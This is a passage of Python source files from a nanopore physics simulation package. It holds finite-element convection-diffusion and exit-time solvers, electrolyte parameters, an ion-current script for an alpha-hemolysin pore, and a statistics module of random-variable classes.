for k, (i,j) in enumerate(product(i3, i3)):
Dv[np.ascontiguousarray(v2d[k::dim**2])] = np.ascontiguousarray(Da[:, i, j])
setup.phys.update(Dp=D, Dm=D)
return D
```
#### File: nanopores/physics/convdiff.py
```python
"standard convection-diffusion/transport equation with a given force field"
"u_t = div(-D*grad(u) + D/kT*F*u) + f"
from dolfin import *
from nanopores.tools.pdesystem import GeneralLinearProblem, LinearPDE
from nanopores.tools.transientpde import *
from nanopores.tools import solvermethods
__all__ = ["ConvectionDiffusionProblem", "ConvectionDiffusion"]
class ConvectionDiffusionProblem(GeneralLinearProblem):
method = dict(solvermethods.direct_reuse)
@staticmethod
def space(mesh, k=1, steady=False):
V = FunctionSpace(mesh, 'CG', k)
if steady:
R = FunctionSpace(mesh, 'Real', 0)
return V*R
else:
return V
@staticmethod
def initial_u(V, u0=None, steady=False):
u = Function(V)
if steady and u0 is not None:
W = V.sub(0).collapse()
w = interpolate(u0, W)
R = V.sub(1).collapse()
assign(u, [w, Function(R)])
elif u0 is not None:
u.interpolate(u0)
return u
@staticmethod
def forms(V, geo, phys, u, F, f=None, dt=None, steady=False, cyl=False):
u1 = TrialFunction(V)
v = TestFunction(V)
if steady:
u1, c = split(u1)
v, d = split(v)
u0, _ = split(u)
r2pi = Expression("2*pi*x[0]") if cyl else Constant(1.0)
dx = geo.dx("fluid")
grad = phys.grad
#lscale = Constant(phys.lscale)
#n = FacetNormal(geo.mesh)
D = geo.pwconst("Dtarget")
#D = Constant(phys.DtargetBulk)
kT = Constant(phys.kT)
# J = -D*grad(u) + D/kT*F*u
def J(u):
return -D*grad(u) + D/kT*F*u
if f is None: # injection function
f = Constant(0.)
if steady or dt is None:
# -div(J) = f mit Neumann constraint
a = inner(J(u1), grad(v))*r2pi*dx + (c*v + u1*d)*r2pi*dx
L = f*v*r2pi*dx + u0*d*r2pi*dx
else:
dt = Constant(dt)
# u_t = -div(J(u)) - f
# backward euler:
# (u1 - u)/dt = -div(J(u1)) - f
# u1 + dt*div(J(u1)) = u - dt*f
a = (u1*v - dt*inner(J(u1), grad(v)))*r2pi*dx
L = (u*v - dt*f*v)*r2pi*dx
#aNoBC = dt*lscale*inner(J(u1), n*v)*r2pi*geo.ds("lowerb")
return (a, L)
@staticmethod
def bcs(V, geo, bc={}, steady=False):
if steady:
return geo.pwBC(V.sub(0), "c0", value=bc)
else:
return geo.pwBC(V, "c0", value=bc)
class ConvectionDiffusion(TransientLinearPDE):
def __init__(self, geo=None, phys=None, dt=None, **problem_params):
TransientLinearPDE.__init__(self, ConvectionDiffusionProblem, geo=geo,
phys=phys, dt=dt, **problem_params)
class ConvectionDiffusionSteady(LinearPDE):
def __init__(self, geo=None, phys=None, **problem_params):
LinearPDE.__init__(self, geo, ConvectionDiffusionProblem,
phys=phys, steady=True, **problem_params)
```
#### File: nanopores/physics/electrolyte.py
```python
from nanopores.physics.default import *
T = 293 # temperature [K]
bulkcon = 300. # bulk concentration of ions [mol/m**3]
D = 1.9e-9 # diffusivity [m^2/s]
pscale = 1e7 # scaling of pressure
kT = lambda T: kB*T
UT = lambda kT: kT/qq
mu = lambda D, kT: D*qq/kT # mobility [m^2/Vs]
cFarad = qq*mol # Faraday constant [C/mol]
debye = lambda bulkcon, kT: dolfin.sqrt(rpermw*eperm*kT/qq**2/2/mol/bulkcon) # debye length [m]
bulkconduct = lambda bulkcon, mu: 2.*bulkcon*cFarad*mu # electrolyte bulk conductivity [S/m]
# rhs data
surfcharge = dict() # surface charge densities for Neumann RHS
volcharge = dict() # volume charges for RHS
cpflux = dict()
cmflux = dict()
# diffusion constants for 1:1 electrolyte
Dpdict = Dmdict = dict(default = "D", solid = 0.)
def Dp(geo, Dpdict):
return geo.pwconst("Dp", value=Dpdict)
def Dm(geo, Dmdict):
return geo.pwconst("Dm", value=Dmdict)
# piece-wise boundary conditions
v0 = dict()
c0 = dict()
cp0 = cm0 = c0
# no-slip velocity
U0 = lambda dim: dolfin.Constant(tuple(0. for i in range(dim)))
noslip = dict(noslip = "U0")
pressure = dict(nopressure = 0.)
synonymes = dict(
nocbc = set(),
)
```
#### File: nanopores/physics/exittime.py
```python
from dolfin import *
from ..tools.pdesystem import GeneralLinearProblem
from ..tools.transientpde import *
from ..tools.illposed import IllposedLinearSolver, Functional
__all__ = ["ExitTimeProblem", "SurvivalProblem", "SuccessfulExit"]
class ExitTimeProblem(GeneralLinearProblem):
k = 1
method = dict(
reuse = True,
iterative = False,
lusolver = ("superlu_dist" if has_lu_solver_method("superlu_dist") else "default"),
luparams = dict(
symmetric = False,
same_nonzero_pattern = True,
reuse_factorization = True,),
ks = "bicgstab",
kp = "ilu",
kparams = dict(
maximum_iterations = 200,
monitor_convergence = False,
relative_tolerance = 1e-4,
error_on_nonconvergence = False,
preconditioner = dict(
ilu = dict(fill_level = 1)))
)
@staticmethod
def space(mesh):
return FunctionSpace(mesh, 'CG', ExitTimeProblem.k)
@staticmethod
def forms(V, geo, phys, F):
u = TrialFunction(V)
v = TestFunction(V)
dx = geo.dx("exittime")
grad = phys.grad
# TODO: for some reason, taking the pwconst causes conflict with F, results in u=NaN
D = phys.DtargetBulk #geo.pwconst("Dtarget")
mu = D/phys.kT
J = -D*grad(v) + v*mu*F
a = inner(J, grad(u))*dx # this is the dual of -div(J(u))
L = Constant(-1.0)*v*dx
return (a, L)
@staticmethod
def bcs(V, geo, exit={"exit"}):
return [geo.BC(V, Constant(0.0), bou) for bou in exit]
class SurvivalProblem(GeneralLinearProblem):
k = 1
method = dict(
reuse = True,
iterative = False,
lusolver = ("superlu_dist" if has_lu_solver_method("superlu_dist") else "default"),
luparams = dict(
symmetric = False,
same_nonzero_pattern = True,
reuse_factorization = True,),
ks = "bicgstab",
kp = "ilu",
kparams = dict(
maximum_iterations = 1000,
monitor_convergence = False,
relative_tolerance = 1e-4,
error_on_nonconvergence = False,
preconditioner = dict(
ilu = dict(fill_level = 1)))
)
@staticmethod
def space(mesh):
return FunctionSpace(mesh, 'CG', SurvivalProblem.k)
@staticmethod
def forms(V, geo, phys, u, F, dt=None, steady=False):
u1 = TrialFunction(V)
v = TestFunction(V)
dx = geo.dx("exittime")
grad = phys.grad
# TODO: for some reason, taking the pwconst causes conflict with F, results in u=NaN
D = phys.DtargetBulk #geo.pwconst("Dtarget")
mu = D/phys.kT
J = -D*grad(v) + v*mu*F
if steady or dt is None:
a = inner(J, grad(u1))*dx
L = Constant(0.)*v*dx
else: # transient case
# backward euler: (u1 - u)/dt + divJ*(u1) = 0
a = (u1*v - dt*inner(J, grad(u1)))*dx
L = u*v*dx
return (a, L)
@staticmethod
def bcs(V, geo, goodexit=set(), badexit={"exit"}):
return ([geo.BC(V, Constant(0.0), bou) for bou in badexit] +
[geo.BC(V, Constant(1.0), bou) for bou in goodexit])
@staticmethod
def initial_u(V, u0=0.):
u = Function(V)
# initial condition u(x,0) = u0
# u0 = 1 for "survival" type problem, u0 = 0 for "death"
u.vector()[:] = u0
return u
class SuccessfulExit(TransientLinearPDE):
def __init__(self, geo=None, phys=None, dt=None, **problem_params):
TransientLinearPDE.__init__(self, SurvivalProblem, geo=geo,
phys=phys, dt=dt, **problem_params)
p = self.solution
pz = lambda z: p([0., 0., z])
zbtm = geo.params["zporebtm"]
ztop = geo.params["ztop"]
self.plotter = TimeDependentPlotter(pz, [zbtm, ztop, 200], dt)
def visualize(self):
self.plotter.plot(self.time[-1])
def finish_plots(self):
self.plotter.finish()
self.plot_functionals("semilogx")
```
#### File: nanopores/physics/pore_mol.py
```python
from nanopores.physics.pore import *
Qmol = 0. # molecule charge [q]
Qmolq = lambda Qmol, qq: Qmol*qq
qTarget = Qmolq
rpermMol = rpermDNA
permMol = lambda eperm, rpermMol: eperm*rpermMol
cyl = lambda dim: True if dim==2 else False
posDTarget = True # if True, position-dep. D used for target mols
# params for unspecific binding
bind_prob = 0.1
bind_time = .04e6 # binding duration [ns]
volcharge.update(
molecule = "Moleculeqv",
)
permittivity.update(
molecule = "permMol",
molecules = "permMol",
)
# geometry-dependent parameters
def Moleculeqv(geo, Qmolq, lscale, r2pi): #
"Molecule volume charge density [C/nm**3], adapted to discrete volume"
scale = dolfin.Constant(1.0/lscale**3)
r = scale*r2pi
def compute(geo):
vol = dolfin.assemble(r*geo.dx("molecule"))
return Qmolq/vol if vol > 0. else 0.
const = geo.constant("Moleculeqv", compute)
return const
def rMolecule(geo):
return geo.params["rMolecule"]
def rTarget(rMolecule, lscale):
return rMolecule/lscale
def DTargetBulk(rTarget, kT, eta, pi):
"Stokes-Einstein relation"
return kT/(6.*pi*eta*rTarget)
def ForceField(geo, grad, eta, qTarget, rTarget, pi):
def Forces0(v, u, subdomain=None):
E = -grad(v)
Fel = dolfin.Constant(qTarget)*E
Fdrag = dolfin.Constant(6.*pi*eta*rTarget)*u
F = Fel + Fdrag
# projecting
if subdomain is not None:
mesh = geo.submesh(subdomain)
else:
mesh = geo.mesh
V = dolfin.VectorFunctionSpace(mesh, "CG", 1)
Fel = dolfin.project(Fel, V)
Fdrag = dolfin.project(Fdrag, V)
F = dolfin.project(F, V)
return F, Fel, Fdrag
return Forces0
# goal functionals of various continuous quantities
def Fbare(geo, r2pi, Moleculeqv, grad, invscale):
def _Fel(v, i):
dx = geo.dx("molecule")
#scale = dolfin.Constant(lscale**(-3))
return Moleculeqv*(-r2pi*grad(v)[i])*dx
return _Fel
# results functionals
def ForcesPNPS(geo, Moleculeqv, div, grad, eta, r2pi,
invscale, dim, cFarad, pscale):
"electric and drag forces in 3D based on volume integrals"
def _forces(U):
v, cp, cm, u, p = U
p *= dolfin.Constant(pscale)
dx = geo.dx("molecule")
dxf = geo.dx("fluid")
rho0 = Moleculeqv
eta2 = dolfin.Constant(2.*eta)
sym = dolfin.sym
inner = dolfin.inner
V = dolfin.VectorFunctionSpace(geo.mesh, "CG", 1)
Farad = dolfin.Constant(cFarad)
fstokes = -Farad*(cp - cm)*grad(v)
F_dict = dict(Fel=[], Fdrag=[])
for i in range(dim):
Fbarevol = rho0*(-grad(v)[i]) * r2pi*invscale(3)*dx
ei = tuple((1. if j==i else 0.) for j in range(dim))
ei = dolfin.Constant(ei)
uaux = dolfin.Function(V)
geo.BC(V, ei, "moleculeb").apply(uaux.vector())
Fdragvol = -(-inner(fstokes, uaux) + \
eta2*inner(sym(grad(u)), sym(grad(uaux))) + \
div(uaux)*p)* r2pi*invscale(3)*dxf
F_dict["Fel"].append(dolfin.assemble(Fbarevol))
F_dict["Fdrag"].append(dolfin.assemble(Fdragvol))
F_dict["F"] = [Fe+Fd for Fe, Fd in zip(F_dict["Fel"], F_dict["Fdrag"])]
return F_dict
return _forces
def Fdrag(geo, div, grad, eta, r2pi, invscale, dim, pscale):
"Drag force on Stokes solution with zero RHS"
def _force(U):
u, p = U
p *= dolfin.Constant(pscale)
dxf = geo.dx("fluid")
eta2 = dolfin.Constant(2.*eta)
sym = dolfin.sym
inner = dolfin.inner
V = dolfin.VectorFunctionSpace(geo.mesh, "CG", 1)
F_dict = dict(Fdrag=[])
for i in range(dim):
ei = tuple((1. if j==i else 0.) for j in range(dim))
ei = dolfin.Constant(ei)
uaux = dolfin.Function(V)
geo.BC(V, ei, "moleculeb").apply(uaux.vector())
Fdragvol = -(eta2*inner(sym(grad(u)), sym(grad(uaux))) + \
div(uaux)*p)* r2pi*invscale(3)*dxf
F_dict["Fdrag"].append(dolfin.assemble(Fdragvol))
return F_dict
return _force
```
#### File: nanopores/scripts/ahemIV.py
```python
import math, nanopores, dolfin
# @Benjamin, Gregor TODO:
# -) check permittivity and surface charge of ahem
# -) what biased voltage to use?
# some default values for parameters
### geo params [nm]
geo_name = "aHem"
domscale = 1.
l4 = 15.
l3 = 15.
R = 20.
r0 = 5.
z0 = 10.
exit_i = 1
badexit = {"upperbulkb"}
goodexit = {"exit"}
### phys params
phys_name = "pore_molecule"
bV = .5 # [V]
ahemqs = 0.0 # [C/m**2]
rTarget = 0.5e-9 # [m] for diffusion coeff.
bulkcon = 1000
### num params
clscale = 10.
refinement = False
maxcells = 50e3
newtondamp = 1.0
reuse_mesh = False
tolnewton = 1e-1
skip_stokes = True
iterative = True
def _update(dic, dic2): # conservative update
dic.update({key:dic2[key] for key in dic2 if not key in dic})
def _globals(): # globals except hidden ones ("_"), modules and functions
from types import ModuleType, FunctionType
return {key : var for key, var in globals().items() if not
(key.startswith("_") or isinstance(var, ModuleType) or isinstance(var, FunctionType))}
def calculate(**params):
# this time we do it the simple way: just pass every parameter
# have to be careful though
globals().update(params)
params.update(_globals())
# use some of the parameters
params["x0"] = [r0, 0., z0]
params["l3"] = l3*domscale
params["R"] = R*domscale
# TODO does this something?
nanopores.IllposedNonlinearSolver.newtondamp = newtondamp
nanopores.PNPS.tolnewton = tolnewton
t = dolfin.Timer("meshing")
geo = nanopores.geo_from_xml_threadsafe(geo_name, **params)
print "Mesh generation time:",t.stop()
#dolfin.plot(geo.submesh("solid"), interactive=True)
phys = nanopores.Physics(phys_name, geo, **params)
t = dolfin.Timer("PNPS")
pnps = nanopores.PNPS(geo, phys)
if skip_stokes:
pnps.solvers.pop("Stokes")
pnps.alwaysstokes = True
pnps.solve()
print "Time to calculate F:",t.stop()
#pnps.visualize("fluid")
(v, cp, cm, u, p) = pnps.solutions(deepcopy=True)
# F = phys.Feff(v, u)
# def avg(u, dx):
# return dolfin.assemble(u*dx)/dolfin.assemble(dolfin.Constant(1.)*dx)
Jcomp = ["Jzdiff", "Jzdrift", "Jzstokes"]
lPore = geo.params["ltop"]+geo.params["lctr"]+geo.params["lbtm"]
Jzdiff = dolfin.Constant((1.0/phys.lscale)**2) * phys.cFarad*phys.D*phys.rDPore*phys.grad(-cp+cm)[2] /lPore * geo.dx("pore")
Jzdrift = dolfin.Constant((1.0/phys.lscale)**2) * phys.cFarad*phys.mu*phys.rDPore*(-cp-cm)*phys.grad(v)[2]/lPore * geo.dx("pore")
Jzstokes = dolfin.Constant((1.0/phys.lscale)**2) * phys.cFarad*phys.stokesdampPore*(cp-cm)*u[2]/lPore * geo.dx("pore")
Jcomponents = [j+p for j in Jcomp for p in ["top","btm"]]
Jzdifftop = dolfin.Constant((1.0/phys.lscale)**2) * phys.cFarad*phys.D*phys.rDPore*phys.grad(-cp+cm)[2] /geo.params["ltop"] * geo.dx("poretop")
Jzdrifttop = dolfin.Constant((1.0/phys.lscale)**2) * phys.cFarad*phys.mu*phys.rDPore*(-cp-cm)*phys.grad(v)[2]/geo.params["ltop"] * geo.dx("poretop")
Jzstokestop = dolfin.Constant((1.0/phys.lscale)**2) * phys.cFarad*phys.stokesdampPore*(cp-cm)*u[2]/geo.params["ltop"] * geo.dx("poretop")
Jzdiffbtm = dolfin.Constant((1.0/phys.lscale)**2) * phys.cFarad*phys.D*phys.rDPore*phys.grad(-cp+cm)[2] /geo.params["lbtm"] * geo.dx("porebottom")
Jzdriftbtm = dolfin.Constant((1.0/phys.lscale)**2) * phys.cFarad*phys.mu*phys.rDPore*(-cp-cm)*phys.grad(v)[2]/geo.params["lbtm"] * geo.dx("porebottom")
Jzstokesbtm = dolfin.Constant((1.0/phys.lscale)**2) * phys.cFarad*phys.stokesdampPore*(cp-cm)*u[2]/geo.params["lbtm"] * geo.dx("porebottom")
result = pnps.get_functionals()
for j in Jcomp+Jcomponents:
result.update({j: 1e12*dolfin.assemble(locals()[j])})
return result
```
#### File: nanopores/scripts/stokes_diffusivity.py
```python
from math import pi
k = 1.38064e-23
T = 273 + 20
eta = 1e-3
def Dstokes(r):
return k*T/(6*pi*eta*r) * 1e18
def rstokes(D):
return k*T/(6*pi*eta*D) * 1e18
# experimental data
# name : radius [nm], diffusivity [nm**2/ns]
data = {
"K+" : (0.152, 1.96),
"Na+" : (0.116, 1.33),
"Cl-" : (0.167, 2.03)
}
if __name__ == "__main__":
# some examples
s0 = "%s\nD (measured): %s\nD (Stokes): %s"
s1 = "r (measured): %s\nr (Stokes): %s\n"
for name, (r, D) in data.items():
Ds = Dstokes(r)
print s0 % (name, D, Ds)
rs = rstokes(D)
print s1 % (r, rs)
```
#### File: nanopores/tools/statistics.py
```python
import numpy as np
import matplotlib.pyplot as plt
import scipy.stats as stats
from collections import OrderedDict
class RandomVariable(object):
i = 0
parameters = {}
derived_from = []
def __init__(self, *unnamed, **named):
self.i = RandomVariable.i
RandomVariable.i += 1
self.constants = dict(self.parameters)
self.inputs = {}
self.fixed = dict.fromkeys(self.parameters.keys(), True)
self.is_derived_from = {k: (True if k in self.derived_from else False
) for k in self.parameters}
# simple fallback mechanism if unnamed variables are passed
# (pick the first best parameter name which is not explicitly passed,
# following the convention that RV names are upper- and constants are
# lower-case)
X_names = (k for k in self.parameters if (not k in named) and k.isupper())
c_names = (k for k in self.parameters if (not k in named) and k.islower())
for X in unnamed:
if isinstance(X, RandomVariable):
name = X_names.next()
named[name] = X
else:
name = c_names.next()
named[name] = X
for name, X in named.items():
if not name in self.parameters:
continue
if isinstance(X, RandomVariable):
self.inputs[name] = X
self.constants.pop(name)
if not X.is_fixed:
self.fixed[name] = False
else:
if X is not None:
self.constants[name] = X
else:
self.fixed[name] = False
self.is_fixed = all(self.fixed.values())
self.population = self.missing()
self.shape_pop = ()
def __getattr__(self, attr):
return self.params()[attr]
def params(self):
return dict(self.constants, **self.inputs)
def sample_params(self, shape, train=False):
params = {}
for name, X in self.inputs.items():
if self.is_derived_from[name]:
params[name] = X.sample_params(shape, train)
else:
params[name] = X.sample(shape, train)
for name, x in self.constants.items():
if train and name in self.population:
params[name] = self.population[name].reshape(shape[:-1] + (1,))
else:
params[name] = x
return params
def sample(self, shape=None, train=False):
"generate sample of length N"
params = self.sample_params(shape, train)
return self.sample_(shape, **params)
def pdf(self, x, N=1000, train=False, log=False, compute_std=False):
"probability density computed by taking means over input samples"
shape_p = self.shape_pop if train else ()
shape = (1,)*x.ndim + shape_p + (N,)
x = x.reshape(x.shape + (1,)*(len(shape_p) + 1))
params = self.sample_params(shape, train)
X = self.pdf_(x, **params)
factor = x[..., 0] if log else 1.
if compute_std:
self._std = factor * np.std(X, axis=-1)/np.sqrt(N)
return factor * np.mean(X, axis=-1)
def cdf(self, x, N=1000, train=False, compute_std=False):
"cdf computed by taking means over input samples"
shape_p = self.shape_pop if train else ()
shape = (1,)*x.ndim + shape_p + (N,)
x = x.reshape(x.shape + (1,)*(len(shape_p) + 1))
params = self.sample_params(shape, train)
X = self.cdf_(x, **params)
if compute_std:
self._std = np.std(X, axis=-1)/np.sqrt(N)
return np.mean(X, axis=-1)
def fit(self, sample, method="cdf", **fit_params):
fit_function = getattr(self, "fit_" + method)
return fit_function(sample, **fit_params)
def fit_cdf(self, sample, log=False, N=100, Ngrid=50, **anneal_params):
"optimize MSE on cdf with annealing."
xi = grid(sample, tail=0.005, log=log, N=Ngrid)
yi = empirical_cdf(xi, sample)[:, None]
def F(xi, yi):
fxi = self.cdf(xi, N=N, train=True)
return np.mean((fxi - yi)**2, 0)
return self.anneal(F, xi, yi, **anneal_params)
def fit_pdf(self, sample, log=False, N=100, Ngrid=50, **anneal_params):
"optimize MSE on cdf with annealing."
xi = grid(sample, tail=0.005, log=log, N=Ngrid)
xi, yi = empirical_pdf(xi, sample, log=log)
yi = yi[:, None]
def F(xi, yi):
fxi = self.pdf(xi, N=N, train=True, log=log)
return np.mean((fxi - yi)**2, 0)
return self.anneal(F, xi, yi, **anneal_params)
def anneal(self, F, xi, yi, n_pop=100, tol=1e-3, n_it=20, sigma=5., factor=0.5,
verbose=True):
"minimize loss function F(xi, yi; p) wrt p with simulated annealing"
# n_pop = size of population in one iteration
# n_it = number of iterations
# sigma = initial (multiplicative) standard deviation
# factor = factor to reduce sigma per iteration
# calculate number of iterations necessary to have sigma*factor**n <= tol
n_it = int(np.ceil((np.log(tol) - np.log(sigma))/np.log(factor)))
if verbose:
t = self.recursive_missing()
print " ".join(map(lambda t: "%s%d" % t[::2], t))
print " ".join(map(lambda t: "%.2f" % t[1], t))
for k in range(n_it):
# create new population by adding multiplicative gaussian noise
self.spawn_population_lognormal(n_pop=n_pop, sigma=sigma)
# compute loss
f = F(xi, yi)
# replace p by new best guess
self.update_from_population(np.argmin(f))
# update sigma
sigma *= factor
# print params
if verbose:
print " ".join(map(lambda t: "%.2g" % t[1],
self.recursive_missing()))
if verbose:
print "stopped after %d iterations" % n_it
print "minimum", min(f)
return min(f) #self.recursive_missing()
def fit_naive(self, sample):
params = self.fit_(sample)
update = {k: params[k] for k in params if k not in self.fixed[k]}
self.update(update)
for k in self.inputs:
if k in update:
sample = np.array([update[k]])
self.inputs[k].fit_naive(sample)
def missing(self):
return {k: v for k, v in self.constants.items() if not self.fixed[k]}
def fix(self):
self.fixed = dict.fromkeys(self.fixed.keys(), True)
self.is_fixed = True
for X in self.inputs.values():
X.fix()
def update(self, **params):
for k in params:
if k in self.constants:
self.constants[k] = params[k]
def update_from_population(self, i):
"set constants to i-th value of population"
self.update(**{k: v[i] for k, v in self.population.items()})
for X in self.inputs.values():
if not X.is_fixed:
X.update_from_population(i)
def set_population(self, **params):
first = params.values()[0]
if np.isscalar(first):
self.shape_pop = ()
assert all(np.isscalar(p) for p in params.values())
else:
self.shape_pop = first.shape
assert all(p.shape == self.shape_pop for p in params.values())
missing = self.missing()
self.population = {k: params[k] for k in params if k in missing}
def spawn_population_lognormal(self, n_pop=100, sigma=5.):
# TODO: in principle, uncertain parameters could be RVs themselves
# then one would have either to discriminate two kinds of inputs
# or collapse sampling and population spawning
self.shape_pop = (n_pop,)
self.population = {}
for k in self.missing():
c = self.constants[k]
self.population[k] = c * np.exp(np.random.randn(n_pop)*sigma)
for X in self.inputs.values():
if not X.is_fixed:
X.spawn_population_lognormal(n_pop, sigma)
# the following 3 should be overloaded to specify model:
def sample_(self, shape, **params):
return np.random.random(shape)
# default behaviour is to construct empirical dfs from sample
#def pdf_(self, t, K, tau):
# return stats.gamma.pdf(t, K, scale=tau)
def __repr__(self):
name = type(self).__name__
params = self.constants.items() + self.inputs.items()
params = ", ".join(["%s=%s" % item for item in params])
return "%s(%s)" % (name, params)
def __mul__(self, t): # t * self
if isinstance(t, RandomVariable):
return Product(X=self, Y=t)
else:
return ScalarMultiple(t=t, X=self)
def __rmul__(self, t): # self * t
return self.__mul__(t)
def recursive_params(self):
# returns items for nonuniqueness
params = [(k, v, self.i) for k, v in self.constants.items()]
for X in self.inputs.values():
params.extend(X.recursive_params())
return params
def recursive_missing(self):
params = [(k, v, self.i) for k, v in self.missing().items()]
for X in self.inputs.values():
params.extend(X.recursive_missing())
return params
def print_params(self):
print ", ".join([
"%s=%s (%d)" % item for item in self.recursive_params()])
def plot_cdf(self, x, *args, **kwargs):
std = True if not "std" in kwargs else kwargs.pop("std")
fx = self.cdf(x, N=1000, compute_std=std)
line, = plt.plot(x, fx, *args, **kwargs)
if std:
itv = 2*self._std
plt.fill_between(x, fx - itv, fx + itv,
color=line.get_color(), alpha=0.2)
def plot_pdf(self, x, *args, **kwargs):
log = False if not "log" in kwargs else kwargs.pop("log")
std = True if not "std" in kwargs else kwargs.pop("std")
# plot at centers for compatibility with hist
x = .5*(x[1:] + x[:-1])
fx = self.pdf(x, N=1000, compute_std=std, log=log)
line, = plt.plot(x, fx, *args, **kwargs)
if std:
itv = 2*self._std
plt.fill_between(x, fx - itv, fx + itv,
color=line.get_color(), alpha=0.2)
def compare_cdfs(self, sample, log=True):
t = grid(sample, 20, 0.005, log=log)
tt = grid(sample, 100, 0.005, log=log)
plt.plot(t, empirical_cdf(t, sample), "o")
self.plot_cdf(tt)
if log:
plt.xscale("log")
def compare_pdfs(self, sample, log=True):
t = grid(sample, 20, 0.005, log=log)
tt = grid(sample, 100, 0.005, log=log)
t, epdf = empirical_pdf(t, sample, log=log)
plt.plot(t, epdf, "o")
self.plot_pdf(tt, log=log)
if log:
plt.xscale("log")
def empirical_cdf(x, data):
"evaluate edcf of data at points x, i.e. np.mean(data < x) for all x"
data = np.sort(data)
return np.searchsorted(data, x)/float(data.size)
def empirical_pdf(x, data, log=False):
"evaluate epdf at bin centers by creating normed histogram"
p, _ = np.histogram(data, bins=x)
mass = np.dot(np.diff(np.log(x)), p) if log else np.dot(np.diff(x), p)
x = .5*(x[1:] + x[:-1])
return x, p/mass
def empirical_cdf_vec(x, data):
# x and data just have to be broadcastable, sampling dimension is last
return np.mean(data <= x, axis=-1)
def grid(data, N=100, tail=0.01, log=False, xmin=None, xmax=None):
"regularly spaced evaluation nodes spanning data distribution"
data = np.sort(data)
n = data.size
# set limits near tail ends on both sides
xmin = data[int(np.floor(tail*n))]
xmax = data[int(np.ceil((1.-tail)*n))-1]
if log:
return np.logspace(np.log10(xmin), np.log10(xmax), N)
else:
return np.linspace(xmin, xmax, N)
####### commonly used RVs #########
class Constant(RandomVariable):
parameters = dict(c=1.)
def sample_(self, shape, c):
return np.full(shape, c)
class Empirical(RandomVariable):
def __init__(self, data):
self.data = data
RandomVariable.__init__(self)
def sample_(self, shape):
return np.random.choice(self.data, size=shape)
def cdf_(self, x):
return empirical_cdf(x, self.data)
class Bernoulli(RandomVariable):
parameters = dict(p=.5)
def sample_(self, shape, p):
return stats.bernoulli.rvs(p, size=shape)
#class Categorical(RandomVariable):
# """generalization of Bernoulli variable, output is integer 0,...,n-1 with
# resp. probability p_0,...,p_n-1. n is no parameter, but fixed at
# instantiation by the length of the probabilities vector."""
#
# # TODO: maybe have to initialize .parameters
# def __init__(self, *p):
# self.n = len(p)
# keys = ["p%d" % i for i in range(self.n)]
# params = dict(zip(keys, p))
# RandomVariable.__init__(self, **params)
#
# def prob(self, pdict):
# "return sorted and normalized probabilities from dict"
# p = np.array([x for _, x in sorted(pdict.items())])
# return p/np.sum(p, axis=0)[None, ...]
#
# # FIXME: does not work for vector-valued probabilities
# def sample_(self, shape, **p):
# return np.random.choice(self.n, size=shape, p=self.prob(p))
class Poisson(RandomVariable):
parameters = dict(a=1.)
def sample_(self, shape, a):
return np.random.poisson(a, shape)
def pdf_(self, x, a):
return stats.poisson.pmf(x, a)
def cdf_(self, x, a):
return stats.poisson.cdf(x, a)
def broadcast_mask(M):
"broadcast boolean mask to index possibly larger array"
colon = slice(None)
return tuple(i if d > 1 else colon for d, i in zip(M.shape, M.nonzero()))
class ZeroTruncatedPoisson(RandomVariable):
"Poisson conditioned on K > 0"
parameters = dict(a=1.)
def sample_(self, shape, a):
if np.isscalar(a) or a.size == 1:
return self.sample_scalar(shape, a)
#print shape, a.shape
AMAX = 30
k = 1
K = np.full(shape, k)
# for large a values, just use non-truncated poisson
large = broadcast_mask(a > AMAX)
small = broadcast_mask(a <= AMAX)
K[large] = np.random.poisson(a[large], K[large].shape)
Ksmall = K[small]
a = a[small]
# actual algorithm begins here
s = a/np.expm1(a)
S = s
U = np.random.random(Ksmall.shape)
new = S < U
while np.any(new):
k += 1
Ksmall[new] = k
s = s*a/float(k)
S = S + s
new = S < U
K[small] = Ksmall
return K
def sample_scalar(self, shape, a):
AMAX = 30
if a > AMAX:
return np.random.poisson(a, shape)
k = 1
K = np.full(shape, k)
s = a/np.expm1(a)
S = s
U = np.random.random(shape)
new = S < U
while np.any(new):
k += 1
K[new] = k
s = s*a/float(k)
S = S + s
new = S < U
return K
def pdf_(self, x, a):
return stats.poisson.pmf(x, a)*np.exp(a)/np.expm1(a)
def cdf_(self, x, a):
return stats.poisson.cdf(x, a)*np.exp(a)/np.expm1(a)
# TODO:
# def fit_(self, data):
# a0 = np.mean(data)
# # solve a0 = a/(1-exp(-a)) for a
# return dict(a=a)
class Exponential(RandomVariable):
parameters = dict(tau=1.)
def sample_(self, shape, tau):
return np.random.exponential(scale=tau, size=shape)
def pdf_(self, t, tau):
return stats.expon.pdf(t, scale=tau)
def cdf_(self, t, tau):
return stats.expon.cdf(t, scale=tau)
def fit_(self, data):
return dict(tau=data.mean())
class LeftTruncatedExponential(RandomVariable):
parameters = dict(tau=1., tmin=0.1)
def sample_(self, shape, tau, tmin):
umax = np.exp(-tmin/tau)
u = umax * np.random.random(size=shape)
return -tau * np.log(u)
def pdf_(self, t, tau, tmin):
return np.exp(-(t-tmin)/tau)/tau * (1.*(t > tmin))
def cdf_(self, t, tau, tmin):
return 1. - np.exp(-np.maximum(t - tmin, 0.)/tau)
class Gamma(RandomVariable):
parameters = dict(K=1, tau=1.)
def sample_(self, shape, K, tau):
return np.random.gamma(K, scale=tau, size=shape)
def pdf_(self, t, K, tau):
return stats.gamma.pdf(t, K, scale=tau)
def cdf_(self, t, K, tau):
return stats.gamma.cdf(t, K, scale=tau)
def fit_(self, data):
K, _, tau = stats.gamma.fit(data)
return dict(K=K, tau=tau)
####### RVs derived from others #########
class ScalarMultiple(RandomVariable):
"implement t*X where X is a RandomVariable and t > 0"
parameters = dict(t=1., X=1.)
derived_from = ["X"]
def sample_(self, shape, t, X):
x = self.inputs["X"].sample_(shape, **X)
return t*x
def pdf_(self, x, t, X):
return self.inputs["X"].pdf_(x/t, **X)/t
def cdf_(self, x, t, X):
return self.inputs["X"].cdf_(x/t, **X)
def __repr__(self):
return "%.2g*%s" % (self.constants["t"], repr(self.inputs["X"]))
class Product(RandomVariable):
"product of two RVs. can only sample."
parameters = dict(X=1., Y=1.)
derived_from = ["X", "Y"]
def sample_(self, shape, X, Y):
x = self.X.sample_(shape, **X)
y = self.Y.sample_(shape, **Y)
return x * y
class Function(RandomVariable):
"arbitrary, fixed function of one RV. can only sample."
parameters = dict(X=1.)
derived_from = ["X"]
def __init__(self, f, X):
# f has to act point-wise on arrays of arbitrary shape
self.f = f
RandomVariable.__init__(self, X=X)
def sample_(self, shape, X):
x = self.X.sample_(shape, **X)
return self.f(x)
class OneOf(RandomVariable):
"""RV is one of X, Y where X is w times more likely than Y.
